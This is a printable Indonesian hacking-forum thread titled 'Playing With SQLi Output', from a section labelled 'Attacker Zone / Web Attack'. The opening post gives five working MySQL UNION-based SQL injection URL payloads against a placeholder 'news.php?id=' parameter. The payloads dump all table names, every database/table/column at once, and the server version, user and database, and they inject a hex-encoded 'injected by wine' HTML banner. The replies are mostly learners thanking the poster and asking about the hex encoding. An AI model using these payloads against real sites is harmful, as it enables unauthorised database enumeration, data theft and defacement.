Share Playing With SQLi Output - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Share Playing With SQLi Output (/thread-5723.html) Pages:
1
2
|
Playing With SQLi Output - wine trochanter - 04-12-2014 Assalamualaikum, numpang share #PART 1 Menampilkan semua table dalam database target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- - Spoiler! :
#PART 2 Menampilkan seluruh database, table dan column dalam satu perintah target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- - Spoiler! :
#PART 3 Menampilkan semua table dengan memberi nomor urutan target/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- - Spoiler! :
#PART 4 Menampilkan versi mysql dan nama kita menggunakan tag dengan html target/news.php?id=90' div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- - Spoiler! :
#PART 5 Menampilkan dan membuat table /news.php?id=90' div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- - Spoiler! :
Okay sampai disini dulu, semoga bermanfaat. See u next time thx to G_26 and Ajkaro \m/\m/\m/ RE: Playing With SQLi Output - cyberly - 04-16-2014 (04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, numpang share klw ente bicara tentang sqli, ane angkat tangan aja dah, ajarin ane bro... :3 RE: Playing With SQLi Output - wine trochanter - 04-16-2014 (04-16-2014, 11:52 AM)cyberly Wrote:(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, numpang share boleh2 cong, ayo belajar sama2 kita RE: Playing With SQLi Output - ./exsucks - 04-17-2014 ijin nyimak dulu om TS , masih belum ngerti SQLI nih soalnya RE: Playing With SQLi Output - iKONspirasi - 04-18-2014 yg 0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20 itu artinya apa bro? RE: Playing With SQLi Output - wine trochanter - 04-18-2014 (04-18-2014, 09:08 AM)iKONspirasi Wrote: yg 0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20 itu artinya apa bro? arti nya ini pak <font face=courier size=3>injected by wine>> \m/\m/ di buat ke hex RE: Playing With SQLi Output - iKONspirasi - 04-18-2014 wooo itu hex toh sep tks udah dijelaskan bro #joss pake tools atau apa nih buat ngerubah hex ke normal? biasanya gw pake ini: http://home.paulschou.net/tools/xlate/ RE: Playing With SQLi Output - wine trochanter - 04-18-2014 (04-18-2014, 08:08 PM)iKONspirasi Wrote: wooo itu hex toh saya pake hackbar aja om trit nya ada disni http://indonesianbacktrack.or.id/forum/thread-5705.html RE: Playing With SQLi Output - wahyuardan - 04-18-2014 wew ,, great om query urlnya RE: Playing With SQLi Output - iKONspirasi - 04-18-2014 (04-18-2014, 08:17 PM)wine trochanter Wrote:(04-18-2014, 08:08 PM)iKONspirasi Wrote: wooo itu hex toh wokee bro, tks infonya |